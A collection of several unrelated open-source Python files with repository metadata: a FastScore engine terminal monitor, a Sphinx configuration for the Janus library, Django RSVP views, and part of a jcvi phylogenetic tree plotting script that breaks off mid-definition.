        else:
            output = results
        output = output.decode(encoding='UTF-8')
        if (self.get_setting('replace_win_eol_with_unix', True)):
            output = output.replace('\r\n', '\n')
        self.print_message(output)

# Glory to Ukraine!
# Слава Україні!
|
{
"content_hash": "2d0012ddf7cce91babb2930d6df6ad68",
"timestamp": "",
"source": "github",
"line_count": 88,
"max_line_length": 146,
"avg_line_length": 34.81818181818182,
"alnum_prop": 0.60411227154047,
"repo_name": "xEdelweiss/sublime-script-test-tool",
"id": "6d4e5ac6b4ed72ab883c9c511ca601bb7ef11a90",
"size": "3076",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ScriptTestTool.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "3076"
}
],
"symlink_target": ""
}
|
import sys
import time
import re
from fastscore.pneumo import EngineStateMsg, EngineConfigMsg, SensorReportMsg
from fastscore.pneumo import WebSocketTimeoutException
from fastscore import Sensor
from .stable import JetStable
from .terminal import Terminal
from .layout import *
from ..colors import tcol
def monitor(connect, verbose=False, **kwargs):
    """Live terminal dashboard for a FastScore engine.

    Subscribes to the Pneumo message bus and keeps redrawing the engine
    state, the loaded model, per-stream throughput (rps/mbps) and per-jet
    throughput until interrupted with Ctrl-C.
    """
    engine = connect.lookup('engine')
    stable = JetStable(engine)
    # Fallback reporting interval (seconds) used when a sensor report
    # carries no delta_time.
    PREINSTALLED_INTERVAL = 2.0
    def draw_engine(name, state):
        # Highlight a RUNNING engine in green.
        if state == "RUNNING":
            s = name + tcol.OKGREEN + " [RUNNING]" + tcol.ENDC
        else:
            s = name + " [" + state + "]"
        return draw(ENGINE_LAYOUT, fixed="Engine:", engine=s)
    def draw_model(model):
        if model == None:
            s = "(not-loaded)"
        else:
            s = model.name + " (" + model.mtype + ")"
        return draw(MODEL_LAYOUT, fixed="Model:", model=s)
    def slot_text(slot):
        # Even slots are inputs, odd slots are outputs.
        if slot % 2 == 0:
            return "I:" + str(slot)
        else:
            return "O:" + str(slot)
    def eof_text(eof):
        return "EOF" if eof else ""
    def rps_text(rps, width):
        return '{:{width},.0f} rps'.format(rps, width=width-4)
    def mbps_text(mbps, width):
        return '{:{width}.1f} mbps'.format(mbps, width=width-5)
    term = Terminal(50)
    l1 = draw_engine(engine.name, engine.state)
    l2 = draw_model(engine.active_model)
    l3 = draw(HEADER_LAYOUT, col1='Stream', col2='', col3='')
    l4 = draw(HEADER_LAYOUT, col1='Jet', col2='Input', col3='Output')
    term.insert('roof', "=" * term.max_width)
    term.insert('engine', l1)
    term.insert('model', l2)
    term.insert('spacer1', "")
    term.insert('header1', l3)
    term.insert('delim1', "-" * term.max_width)
    for slot,x in engine.active_streams.items():
        l = draw(STREAM_LAYOUT, name=x.name,
                 slot=slot_text(slot),
                 eof=eof_text(x.eof),
                 rps='-', mbps='-')
        term.insert(('stream',slot), l)
    term.insert('spacer2', "")
    term.insert('header2', l4)
    # NOTE(review): this reuses the 'delim1' key inserted above; 'delim2'
    # was probably intended -- confirm against Terminal.insert() semantics.
    term.insert('delim1', "-" * term.max_width)
    if engine.active_model != None:
        for x in engine.active_model.jets:
            stable.track(x.sandbox)
            l = draw(JET_LAYOUT, name=engine.active_model.name,
                     eof=eof_text(False),
                     input='-', output='-')
            term.insert(('jet',x.sandbox), l)
    term.insert('cellar', "")
    pneumo = connect.pneumo.socket()
    try:
        while True:
            msg = pneumo.recv()
            if msg.src != engine.name:
                continue # multiple engines
            engine.clear()
            if isinstance(msg, EngineStateMsg):
                l = draw_engine(msg.src, msg.state.upper())
                term.update('engine', l)
                if msg.state == 'init':
                    # engine reset
                    term.update('model', draw_model(None))
                    term.remove_by_tag('stream')
                    term.remove_by_tag('jet')
                    stable.untrackall()
            elif isinstance(msg, EngineConfigMsg):
                if msg.item == 'model':
                    l = draw_model(engine.active_model)
                    term.update('model', l)
                elif msg.item == 'stream':
                    slot = msg.ref
                    if msg.op == 'detach':
                        term.remove(('stream',slot))
                    else:
                        info = engine.active_streams[slot]
                        l = draw(STREAM_LAYOUT, name=info.name,
                                 slot=slot_text(slot),
                                 eof=eof_text(info.eof),
                                 rps='-', mbps='-')
                        if msg.op == 'attach':
                            term.insert(('stream',slot), l, 'spacer2')
                        elif msg.op == 'reattach':
                            term.update(('stream',slot), l)
                elif msg.item == 'jet':
                    engine.clear()
                    sandbox = msg.ref
                    if msg.op == 'start':
                        stable.track(sandbox)
                        l = draw(JET_LAYOUT, name=engine.active_model.name,
                                 eof=eof_text(False),
                                 input='-', output='-')
                        term.insert(('jet',sandbox), l, 'cellar')
                    elif msg.op == 'stop':
                        term.remove(('jet',sandbox))
                        stable.untrack(sandbox)
            elif isinstance(msg, SensorReportMsg):
                m = re.match('jet\\.(\\d+)\\.(input|output)\\.records\\.count', msg.point)
                if m != None:
                    sandbox = m.group(1)
                    io = m.group(2)
                    (pos,width) = field(io, JET_LAYOUT)
                    if msg.delta_time:
                        rps = msg.data / msg.delta_time
                    else:
                        rps = msg.data / Sensor.DEFAULT_INTERVAL
                    term.update(('jet',sandbox), rps_text(rps, width), pos=pos)
                else:
                    m = re.match('manifold\\.(\\d+)\\.records\\.(count|size)', msg.point)
                    if m != None:
                        slot = int(m.group(1))
                        if m.group(2) == 'count':
                            if msg.delta_time:
                                rps = msg.data / msg.delta_time
                            else:
                                rps = msg.data / PREINSTALLED_INTERVAL
                            (pos,width) = field('rps', STREAM_LAYOUT)
                            term.update(('stream',slot), rps_text(rps, width), pos=pos)
                        else: #size
                            if msg.delta_time:
                                mbps = msg.data / msg.delta_time / 1048576.0
                            else:
                                mbps = msg.data / PREINSTALLED_INTERVAL / 1048576.0
                            (pos,width) = field('mbps', STREAM_LAYOUT)
                            term.update(('stream',slot), mbps_text(mbps, width), pos=pos)
    except KeyboardInterrupt:
        # BUG FIX: bare `print` is a no-op expression in Python 3 (this file
        # uses the py3 print function elsewhere); call it to emit the
        # intended newline after ^C.
        print()
        stable.untrackall()
|
{
"content_hash": "01f55e6c04a1806d62866f061f87a66e",
"timestamp": "",
"source": "github",
"line_count": 173,
"max_line_length": 90,
"avg_line_length": 37.410404624277454,
"alnum_prop": 0.4538009888751545,
"repo_name": "opendatagroup/fastscore-cli",
"id": "83e870204ba34bea052a523c3a214b917820ee33",
"size": "6473",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "cli/monitor/monitor.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "1124"
},
{
"name": "Python",
"bytes": "173186"
}
],
"symlink_target": ""
}
|
import os
import sys
sys.path.insert(0, os.path.abspath('..'))

# Core Sphinx extensions used to build the Janus documentation.
extensions = ['sphinx.ext.autodoc',
              'sphinx.ext.autosummary',
              'sphinx.ext.doctest',
              'sphinx.ext.todo',
              'sphinx.ext.coverage',
              'sphinx.ext.mathjax',
              'sphinx.ext.viewcode']
todo_include_todos = True
import sphinx
# BUG FIX: comparing version *strings* is lexicographic ('1.10' < '1.3' is
# True).  sphinx.version_info is a numeric tuple such as (1, 3, 0, ...).
if sphinx.version_info < (1, 3):
    extensions.append('sphinxcontrib.napoleon')
else:
    extensions.append('sphinx.ext.napoleon')
templates_path = ['_templates']
source_suffix = '.rst'
master_doc = 'index'
project = 'Janus'
# Derive the copyright notice from the first line of LICENSE.txt.
# BUG FIX: str.lstrip('Copyright (c)') strips any of those *characters* from
# the left (not the prefix as a whole), so remove the prefix explicitly.
with open('../LICENSE.txt', 'r') as f:
    _first_line = next(f).strip()
_prefix = 'Copyright (c)'
if _first_line.startswith(_prefix):
    _first_line = _first_line[len(_prefix):]
copyright = _first_line.strip()
version = '0.0'
release = '0.0'
exclude_patterns = ['_build']
pygments_style = 'sphinx'
numfig = True
html_logo = './logo_janus-200x200.png'
html_static_path = ['_static']
htmlhelp_basename = 'janusdoc'
latex_elements = {'preamble': '',
                  'inputenc': '',
                  'fontenc': '',
                  'utf8extra': ''}
latex_documents = [
    ('index', 'janus.tex', 'Documentation of the Janus Library',
     'S. Brisard', 'manual'),
]
latex_logo = './logo_janus.png'
man_pages = [
    ('index', 'janus', 'Documentation of the Janus Library',
     ['S. Brisard'], 1)
]
texinfo_documents = [
    ('index', 'janus', 'Documentation of the Janus Library',
     'S. Brisard', 'Janus', 'One line description of project.',
     'Miscellaneous'),
]
autodoc_member_order = 'groupwise'
|
{
"content_hash": "835e820d65f883b0306328b9c18c35ff",
"timestamp": "",
"source": "github",
"line_count": 65,
"max_line_length": 62,
"avg_line_length": 22.753846153846155,
"alnum_prop": 0.5949966193373901,
"repo_name": "sbrisard/janus",
"id": "bf69945e56838ac8b56f3d42e75c2becb8890965",
"size": "1724",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "sphinx/conf.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "5081"
},
{
"name": "C",
"bytes": "288"
},
{
"name": "Jupyter Notebook",
"bytes": "14944"
},
{
"name": "Makefile",
"bytes": "5568"
},
{
"name": "Python",
"bytes": "194513"
},
{
"name": "Shell",
"bytes": "87"
}
],
"symlink_target": ""
}
|
import datetime, simplejson
from django.shortcuts import render_to_response, get_object_or_404
from django.http import HttpResponseRedirect, Http404, HttpResponse
from django.template import RequestContext
from django.core.urlresolvers import reverse
from django.contrib.auth.models import User
from django.contrib.auth.forms import AuthenticationForm
from django.contrib.auth.decorators import permission_required, login_required
from schedule.models import Occurrence, Calendar
from schedule.views import get_occurrence
from django_reservations.models import EventReservations
from django_reservations.forms import RsvpForm
@login_required
def reservations(request, occurrence_id,
                 template_name='django_reservations/reservations.html'):
    """
    Displays all RSVPs for the given occurrence.
    """
    occurrence = get_object_or_404(Occurrence, pk=occurrence_id)
    try:
        event_reservations = occurrence.eventreservations
    except EventReservations.DoesNotExist:
        # Lazily create the reservation record on first view.
        event_reservations = EventReservations(occurrence=occurrence)
        event_reservations.save()
    attendees = event_reservations.reservations.all().order_by('last_name')
    context = RequestContext(request, {
        'occurrence': occurrence,
        'er': event_reservations,
        'rsvpers': attendees,
    })
    return render_to_response(template_name, context)
@login_required
def user_reservations(request, user_id=None, template_name='django_reservations/user_reservations.html'):
    """
    A reservation report for a specific user. Displays their reservation status
    for all RSVP-enabled occurrences in the future.
    """
    attendee = get_object_or_404(User, pk=user_id) if user_id else request.user
    # List of 2-tuples: (calendar, queryset of future RSVPed occurrences)
    cal_data = [
        (calendar,
         Occurrence.objects.filter(event__calendar=calendar,
                                   eventreservations__reservations=attendee,
                                   start__gt=datetime.datetime.now()).order_by('start'))
        for calendar in Calendar.objects.all()
    ]
    context = RequestContext(request, dict(
        cal_data=cal_data,
        attendee=attendee
    ))
    return render_to_response(template_name, context)
@login_required
def rsvp(request, occurrence_id, template_name='django_reservations/rsvp.html'):
    """
    An rsvp page where the logged-in user can see their reservation status and
    modify it.

    GET renders a form pre-populated with the user's current attendance;
    a valid POST saves the occurrence, adds/removes the reservation and
    redirects to the reservations list. An invalid POST re-renders the form.
    """
    occurrence = get_object_or_404(Occurrence, pk=occurrence_id)
    try:
        er = occurrence.eventreservations
        reserved = er.user_reserved(request.user)
    except EventReservations.DoesNotExist:
        # No reservation record exists yet, so the user cannot be attending.
        reserved = False
    if request.method == "POST":
        form = RsvpForm(data=request.POST, instance=occurrence)
        if form.is_valid():
            occurrence = form.save()
            if form.cleaned_data['attending']:
                # Adding to the m2m implicitly relies on the related
                # EventReservations row existing after form.save().
                occurrence.eventreservations.reservations.add(request.user)
            else:
                try:
                    er = occurrence.eventreservations
                    er.reservations.remove(request.user)
                except EventReservations.DoesNotExist:
                    pass # no reservations exist, no need to remove anything
            return HttpResponseRedirect(reverse(
                'reservations_reservations_view', kwargs={'occurrence_id':occurrence.pk}))
    else:
        form = RsvpForm(initial={'attending':reserved}, instance=occurrence)
    context = RequestContext(request, {'form':form, 'occurrence':occurrence, 'reserved':reserved})
    return render_to_response(template_name, context)
def rsvp_by_iso_date(request, event_id, iso_date):
    """
    Make an rsvp for an occurrence that hasn't yet been persisted.
    """
    when = datetime.datetime.strptime(iso_date, "%Y-%m-%dT%H:%M:%S")
    event, occurrence = get_occurrence(
        event_id,
        year=when.year, month=when.month, day=when.day,
        hour=when.hour, minute=when.minute, second=when.second,
    )
    # Persist the occurrence so it can carry reservations, then delegate
    # to the regular rsvp view.
    occurrence.save()
    return rsvp(request, occurrence.pk)
|
{
"content_hash": "892c62b627a641f670b9a7383393736c",
"timestamp": "",
"source": "github",
"line_count": 111,
"max_line_length": 171,
"avg_line_length": 36.86486486486486,
"alnum_prop": 0.6659335288367546,
"repo_name": "winhamwr/django-reservations",
"id": "1a244b0225f648b3600ddc56485d9f8852a12b21",
"size": "4092",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "django_reservations/views.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "10797"
}
],
"symlink_target": ""
}
|
import logging
import sys
from collections import defaultdict
from itertools import groupby
from ete3 import Tree
from jcvi.apps.base import OptionParser, glob
from jcvi.formats.base import LineFile
from jcvi.formats.sizes import Sizes
from jcvi.graphics.base import (
FancyBboxPatch,
Rectangle,
linear_shade,
markup,
normalize_axes,
plt,
savefig,
set3_n,
)
from jcvi.graphics.glyph import ExonGlyph, TextCircle, get_setups
class LeafInfoLine:
    """One row of a leaf-info CSV: leaf name, label color, and an optional
    replacement display name."""

    def __init__(self, row, delimiter=","):
        fields = [token.strip() for token in row.split(delimiter)]
        self.name = fields[0]
        self.color = fields[1]
        # Third column (new display name) is optional.
        self.new_name = fields[2] if len(fields) > 2 else None
class LeafInfoFile(LineFile):
    """Parse a leaf-info CSV file into a name -> LeafInfoLine mapping,
    skipping '#' comment lines."""

    def __init__(self, filename, delimiter=","):
        super(LeafInfoFile, self).__init__(filename)
        self.cache = {}
        with open(filename) as handle:
            for row in handle:
                if row.startswith("#"):
                    continue
                entry = LeafInfoLine(row, delimiter=delimiter)
                self.cache[entry.name] = entry
class WGDInfoLine:
    """One row of a WGD-event CSV: node name, divergence (given as a
    percentage), event name, fill color (empty -> default green), style."""

    def __init__(self, row, delimiter=",", defaultcolor="#7fc97f"):
        fields = [token.strip() for token in row.split(delimiter)]
        self.node_name = fields[0]
        # Stored as a fraction; the input column is a percentage.
        self.divergence = float(fields[1]) / 100
        self.name = fields[2]
        self.color = fields[3] if fields[3] else defaultcolor
        self.style = fields[4]
class WGDInfoFile(LineFile):
    """Parse a WGD-event CSV file into a node_name -> [WGDInfoLine] mapping,
    skipping '#' comment lines."""

    def __init__(self, filename, delimiter=","):
        super(WGDInfoFile, self).__init__(filename)
        self.cache = defaultdict(list)
        with open(filename) as handle:
            for row in handle:
                if row.startswith("#"):
                    continue
                entry = WGDInfoLine(row, delimiter=delimiter)
                self.cache[entry.node_name].append(entry)
def truncate_name(name, rule=None):
    """
    shorten taxa names for tree display
    Options of rule. This only affects tree display.
    - headn (eg. head3 truncates first 3 chars)
    - oheadn (eg. ohead3 retains only the first 3 chars)
    - tailn (eg. tail3 truncates last 3 chars)
    - otailn (eg. otail3 retains only the last 3 chars)
    n = 1 ~ 99
    """
    import re

    if rule is None:
        return name
    # Flattened rule table (was a 4-deep if/else pyramid).  Order matters
    # only in that anchored matching keeps 'head' from matching 'ohead3'.
    actions = (
        ("head", lambda k: name[k:]),    # drop the first k chars
        ("ohead", lambda k: name[:k]),   # keep only the first k chars
        ("tail", lambda k: name[:-k]),   # drop the last k chars
        ("otail", lambda k: name[-k:]),  # keep only the last k chars
    )
    for prefix, slicer in actions:
        m = re.match(prefix + r"([0-9]{1,2})$", rule)
        if m:
            return slicer(int(m.group(1)))
    # Unknown rule: print usage (as before) and fail loudly.
    print(truncate_name.__doc__, file=sys.stderr)
    raise ValueError("Wrong rule for truncation!")
def draw_wgd_xy(ax, xx, yy, wgdline):
    """Draw a single WGD event marker at (xx, yy).

    Args:
        ax (axis): Matplotlib axes
        xx (float): x position
        yy (float): y position
        wgdline (WGDInfo): WGDInfoLine carrying the label and fill color
    """
    circle_style = dict(fc=wgdline.color, radius=0.0225,
                        color="k", fontweight="bold")
    TextCircle(ax, xx, yy, wgdline.name, **circle_style)
def draw_wgd(ax, y, rescale, name, wgdcache):
    """Draw every WGD event registered for *name* at height *y*.

    Args:
        ax (matplotlib.axes): matplotlib axes
        y (float): y position
        rescale (function): maps a divergence value to an x position
        name (str): taxon/internal node name to look up
        wgdcache (Dict): node name -> list of WGDInfoLine
    """
    if not wgdcache:
        return
    for event in wgdcache.get(name, []):
        draw_wgd_xy(ax, rescale(event.divergence), y, event)
def draw_tree(
    ax,
    t,
    hpd=None,
    margin=0.1,
    rmargin=0.2,
    ymargin=0.1,
    tip=0.01,
    treecolor="k",
    supportcolor="k",
    internal=True,
    outgroup=None,
    dashedoutgroup=False,
    reroot=True,
    gffdir=None,
    sizes=None,
    trunc_name=None,
    SH=None,
    scutoff=0,
    leafcolor="k",
    leaffont=12,
    leafinfo=None,
    wgdinfo=None,
    geoscale=False,
    groups=None,  # FIX: was a mutable default ([]); None behaves the same here
):
    """
    Main function for drawing a phylogenetic tree on a matplotlib axes.

    The tree is optionally rerooted, leaves are laid out bottom-to-top,
    branches are drawn rectangularly, and optional annotations are added:
    support values, 95% HPD bars, WGD events, exon glyphs, a scale bar (or
    geological timescale) and clade groupings.

    Args:
        ax: matplotlib axes in normalized (0-1) coordinates
        t: ete3 Tree to render; may be rerooted/modified in place
        hpd: dict of node name -> (lower, upper) divergence interval, or None
        margin/rmargin/ymargin: left/right/bottom margins in axes coords
        tip: small offset used when placing labels and tick marks
        treecolor/supportcolor/leafcolor: branch, support-value (None
            suppresses them) and default leaf-label colors
        internal: show internal node names in circles
        outgroup: taxa for rerooting; midpoint rooting is used when None
        dashedoutgroup: draw the root split dashed with skewed distances
        reroot: whether to reroot the tree at all
        gffdir: directory of per-gene GFF files for exon glyphs
        sizes: FASTA/sizes file used to annotate protein lengths
        trunc_name: leaf-name truncation rule, see truncate_name()
        SH: SH test p-value to print, or None
        scutoff: support display cutoff, 0-100
        leaffont: leaf label font size
        leafinfo: dict of leaf name -> LeafInfoLine styling
        wgdinfo: dict of node name -> list of WGDInfoLine events
        geoscale: draw geological timescale instead of a plain scale bar
        groups: clade group names shown to the right, top to bottom
    """
    groups = groups or []  # normalize the (formerly mutable) default
    if reroot:
        if outgroup:
            R = t.get_common_ancestor(*outgroup)
        else:
            # Calculate the midpoint node
            R = t.get_midpoint_outgroup()
        if R is not t:
            t.set_outgroup(R)
        # By default, the distance to outgroup and non-outgroup is the same
        # we re-adjust the distances so that the outgroups will appear
        # farthest from everything else
        if dashedoutgroup:
            a, b = t.children
            # Avoid even split
            total = a.dist + b.dist
            # NOTE(review): newR is never used afterwards; this branch also
            # assumes outgroup is provided whenever dashedoutgroup is set.
            newR = t.get_common_ancestor(*outgroup)
            a.dist = 0.9 * total
            b.dist = total - a.dist
    farthest, max_dist = t.get_farthest_leaf()
    print("max_dist = {}".format(max_dist), file=sys.stderr)
    xstart = margin
    ystart = 2 * ymargin
    # scale the tree
    scale = (1 - margin - rmargin) / max_dist

    def rescale(dist):
        return xstart + scale * dist

    def rescale_divergence(divergence):
        return rescale(max_dist - divergence)

    num_leaves = len(t.get_leaf_names())
    yinterval = (1 - ystart) / num_leaves
    ytop = ystart + (num_leaves - 0.5) * yinterval
    # get exons structures, if any
    structures = {}
    if gffdir:
        gffiles = glob("{0}/*.gff*".format(gffdir))
        setups, ratio = get_setups(gffiles, canvas=rmargin / 2, noUTR=True)
        structures = dict((a, (b, c)) for a, b, c in setups)
    if sizes:
        sizes = Sizes(sizes).mapping
    coords = {}
    i = 0
    color_groups = []  # Used to plot groups to the right of the tree
    for n in t.traverse("postorder"):
        dist = n.get_distance(t)
        xx = rescale(dist)
        if n.is_leaf():
            yy = ystart + i * yinterval
            i += 1
            if trunc_name:
                name = truncate_name(n.name, rule=trunc_name)
            else:
                name = n.name
            if leafinfo and n.name in leafinfo:
                line = leafinfo[n.name]
                lc = line.color
                sname = line.new_name
            else:
                lc = leafcolor
                sname = None
            lc = lc or "k"
            sname = sname or name.replace("_", "-")
            # if color is given as "R,G,B"
            if "," in lc:
                lc = [float(x) for x in lc.split(",")]
            ax.text(
                xx + tip,
                yy,
                markup(sname),
                va="center",
                fontstyle="italic",
                size=leaffont,
                color=lc,
            )
            color_groups.append((lc, yy, xx))
            gname = n.name.split("_")[0]
            if gname in structures:
                mrnabed, cdsbeds = structures[gname]
                ExonGlyph(
                    ax,
                    1 - rmargin / 2,
                    yy,
                    mrnabed,
                    cdsbeds,
                    align="right",
                    ratio=ratio,
                )
            if sizes and gname in sizes:
                size = sizes[gname]
                size = size / 3 - 1  # base pair converted to amino acid
                size = "{0}aa".format(size)
                ax.text(1 - rmargin / 2 + tip, yy, size, size=leaffont)
        else:
            linestyle = "--" if (dashedoutgroup and n is t) else "-"
            children = [coords[x] for x in n.get_children()]
            children_x, children_y = zip(*children)
            min_y, max_y = min(children_y), max(children_y)
            # plot the vertical bar
            ax.plot((xx, xx), (min_y, max_y), linestyle, color=treecolor)
            # plot the horizontal bar
            for cx, cy in children:
                ax.plot((xx, cx), (cy, cy), linestyle, color=treecolor)
            yy = sum(children_y) * 1.0 / len(children_y)
            # plot HPD if exists
            if hpd and n.name in hpd:
                a, b = hpd[n.name]
                ax.plot(
                    (rescale_divergence(a), rescale_divergence(b)),
                    (yy, yy),
                    "-",
                    color="darkslategray",
                    alpha=0.4,
                    lw=2,
                )
            support = n.support
            if support > 1:
                support = support / 100.0
            if not n.is_root() and supportcolor:
                if support > scutoff / 100.0:
                    ax.text(
                        xx,
                        yy + 0.005,
                        "{0:d}".format(int(abs(support * 100))),
                        ha="right",
                        size=leaffont,
                        color=supportcolor,
                    )
            if internal and n.name:
                TextCircle(ax, xx, yy, n.name, size=9)
            else:  # Just a dot
                TextCircle(ax, xx, yy, None, radius=0.002)
        coords[n] = (xx, yy)
        # WGD info
        draw_wgd(ax, yy, rescale_divergence, n.name, wgdinfo)
    # scale bar
    if geoscale:
        draw_geoscale(
            ax, ytop, margin=margin, rmargin=rmargin, yy=ymargin, max_dist=max_dist
        )
    else:
        br = 0.1
        x1 = xstart + 0.1
        x2 = x1 + br * scale
        yy = ymargin
        ax.plot([x1, x1], [yy - tip, yy + tip], "-", color=treecolor)
        ax.plot([x2, x2], [yy - tip, yy + tip], "-", color=treecolor)
        ax.plot([x1, x2], [yy, yy], "-", color=treecolor)
        ax.text(
            (x1 + x2) / 2,
            yy - tip,
            "{0:g}".format(br),
            va="top",
            ha="center",
            size=leaffont,
            color=treecolor,
        )
    # Groupings on the right, often used to show groups such as phylogenetic
    # clades
    if groups:
        color_groups.sort()
        group_extents = []
        for color, group in groupby(color_groups, key=lambda x: x[0]):
            group = list(group)
            _, min_yy, xx = min(group)
            _, max_yy, xx = max(group)
            group_extents.append((min_yy, max_yy, xx, color))
        group_extents.sort(reverse=True)
        for group_name, (min_yy, max_yy, xx, color) in zip(groups, group_extents):
            group_color = linear_shade(color, fraction=0.85)
            ax.add_patch(
                FancyBboxPatch(
                    (xx, min_yy - yinterval / 2),
                    rmargin - 0.01,
                    max_yy - min_yy + yinterval,
                    boxstyle="round,pad=-0.002,rounding_size=0.005",
                    fc=group_color,
                    ec=group_color,
                )
            )
            # Add the group label
            horizontal = (max_yy - min_yy) < 0.2
            mid_yy = (min_yy + max_yy) / 2
            label_rightend = 0.98
            if horizontal:
                ax.text(
                    label_rightend,
                    mid_yy,
                    markup(group_name),
                    color="darkslategray",
                    ha="right",
                    va="center",
                )
            else:
                ax.text(
                    label_rightend,
                    mid_yy,
                    markup(group_name),
                    color="darkslategray",
                    ha="right",
                    va="center",
                    rotation=-90,
                )
    if SH is not None:
        xs = x1
        ys = (ymargin + yy) / 2.0
        ax.text(
            xs,
            ys,
            "SH test against ref tree: {0}".format(SH),
            ha="left",
            size=leaffont,
            color="g",
        )
def read_trees(tree):
    """Parse a multi-tree file into (label, outgroup, color, newick) tuples.

    Each block starts with a '#' header holding URL-query-style options
    (label, outgroup, optional color); the remaining lines form the newick
    string.
    """
    from urllib.parse import parse_qs
    from jcvi.formats.base import read_block

    trees = []
    # FIX: use a context manager so the file handle is closed (the original
    # leaked the open handle).
    with open(tree) as fp:
        for header, tx in read_block(fp, "#"):
            header = parse_qs(header[1:])
            label = header["label"][0].strip('"')
            outgroup = header["outgroup"]
            (color,) = header.get("color", ["k"])
            trees.append((label, outgroup, color, "".join(tx)))
    return trees
def draw_geoscale(
    ax, ytop, margin=0.1, rmargin=0.2, yy=0.1, max_dist=3.0, contrast_epochs=True
):
    """
    Draw geological epoch on million year ago (mya) scale.
    max_dist = 3.0 => max is 300 mya

    Args:
        ax: matplotlib axes in normalized coordinates
        ytop: top of the highlighted epoch bands
        margin/rmargin: left/right margins, mapping to max mya / 0 mya
        yy: y position of the time axis
        max_dist: tree depth; multiplied by 100 to obtain mya
        contrast_epochs: shade Neogene/Cretaceous bands for contrast
    """
    import math

    a, b = margin, 1 - rmargin  # Correspond to 300mya and 0mya
    minx, maxx = 0, int(max_dist * 100)

    def cv(x):
        # Linear map from mya in [minx, maxx] to axes x in [b, a] (time
        # increases right-to-left).  BUG FIX: the original used (x - b)
        # instead of (x - minx), so cv(minx) != b and cv(maxx) != a
        # (a small but systematic offset of the whole timescale).
        return b - (x - minx) / (maxx - minx) * (b - a)

    ax.plot((a, b), (yy, yy), "k-")
    tick = 0.0125
    # Tick every 25 mya, starting from the nearest multiple of 25.
    scale_start = int(math.ceil(maxx / 25) * 25)
    for mya in range(scale_start - 25, 0, -25):
        p = cv(mya)
        ax.plot((p, p), (yy, yy - tick), "k-")
        ax.text(p, yy - 2.5 * tick, str(mya), ha="center", va="center")
    ax.text(
        (a + b) / 2,
        yy - 5 * tick,
        "Time before present (million years)",
        ha="center",
        va="center",
    )
    # Source:
    # https://en.wikipedia.org/wiki/Geological_period
    Geo = (
        ("Neogene", 2.588, 23.03),
        ("Paleogene", 23.03, 66.0),
        ("Cretaceous", 66.0, 145.5),
        ("Jurassic", 145.5, 201.3),
        ("Triassic", 201.3, 252.17),
        ("Permian", 252.17, 298.9),
        ("Carboniferous", 298.9, 358.9),
    )
    h = 0.05
    for (era, start, end), color in zip(Geo, set3_n(len(Geo))):
        if maxx - start < 10:  # not visible enough
            continue
        start, end = cv(start), cv(end)
        end = max(a, end)  # clamp eras that extend past the left margin
        p = Rectangle((end, yy + tick / 2), abs(start - end), h, lw=1, ec="w", fc=color)
        ax.text(
            (start + end) / 2,
            yy + (tick + h) / 2,
            era,
            ha="center",
            va="center",
            size=8,
        )
        ax.add_patch(p)
    # We highlight recent epochs for better visualization, we just highlight
    # Neogene and Cretaceous as these are more relevant for most phylogeny
    if contrast_epochs:
        for era, start, end in Geo:
            if not era in ("Neogene", "Cretaceous"):
                continue
            # Make a beige patch
            start, end = cv(start), cv(end)
            ax.add_patch(
                Rectangle(
                    (end, yy + tick + h),
                    abs(start - end),
                    ytop - yy - tick - h,
                    fc="beige",
                    ec="beige",
                )
            )
def parse_tree(infile):
    """Parse newick formatted tree file and returns a tuple consisted of a
    Tree object, and a HPD dictionary if 95%HPD is found in the newick string,
    otherwise None
    Args:
        infile (str): Path to the tree file
    """
    import re
    with open(infile) as fp:
        treedata = fp.read()
    # Matches a BEAST/MCMCtree-style annotation such as " [&95%HPD={lo, up}]"
    hpd_re = re.compile(r"( \[&95%HPD=[^[]*\])")
    def repl(match):
        # Replace each annotation with a synthetic internal node name
        # N1, N2, ... and record its (lower, upper) bounds keyed by it.
        repl.count += 1
        name = "N{}".format(repl.count)
        lb, ub = re.findall(r"HPD=\{(.*), (.*)\}", match.group(0))[0]
        repl.hpd[name] = (float(lb), float(ub))
        return name
    # Function attributes serve as mutable state shared with repl() above.
    repl.count = 0
    repl.hpd = {}
    treedata, changed = re.subn(hpd_re, repl, treedata)
    if repl.hpd:
        print(repl.hpd, file=sys.stderr)
    # format=1 lets ete3 read the internal node names we just injected.
    return (Tree(treedata, format=1), repl.hpd) if changed else (Tree(treedata), None)
def main(args):
    """
    %prog newicktree
    Plot Newick formatted tree. The gene structure can be plotted along if
    --gffdir is given. The gff file needs to be `genename.gff`. If --sizes is
    on, also show the number of amino acids.
    """
    # NOTE: the docstring above doubles as the CLI usage text (OptionParser),
    # so it is kept verbatim.
    p = OptionParser(main.__doc__)
    p.add_option(
        "--outgroup",
        help="Outgroup for rerooting the tree. "
        + "Use comma to separate multiple taxa.",
    )
    p.add_option(
        "--noreroot",
        default=False,
        action="store_true",
        help="Don't reroot the input tree",
    )
    p.add_option(
        "--rmargin", default=0.2, type="float", help="Set blank rmargin to the right"
    )
    p.add_option("--gffdir", default=None, help="The directory that contain GFF files")
    p.add_option("--sizes", default=None, help="The FASTA file or the sizes file")
    p.add_option("--SH", default=None, type="string", help="SH test p-value")
    group = p.add_option_group("Node style")
    group.add_option("--leafcolor", default="k", help="Font color for the OTUs")
    # NOTE(review): no type="int" here, so a user-supplied --leaffont arrives
    # as a str while the default stays int -- confirm downstream accepts both.
    group.add_option("--leaffont", default=12, help="Font size for the OTUs")
    group.add_option(
        "--leafinfo", help="CSV file specifying the leaves: name,color,new_name"
    )
    group.add_option(
        "--scutoff",
        default=0,
        type="int",
        help="cutoff for displaying node support, 0-100",
    )
    group.add_option(
        "--no_support",
        dest="support",
        default=True,
        action="store_false",
        help="Do not print node support values",
    )
    group.add_option(
        "--no_internal",
        dest="internal",
        default=True,
        action="store_false",
        help="Do not show internal nodes",
    )
    group = p.add_option_group("Edge style")
    group.add_option(
        "--dashedoutgroup",
        default=False,
        action="store_true",
        help="Gray out the edges connecting outgroup and non-outgroup",
    )
    group = p.add_option_group("Additional annotations")
    group.add_option(
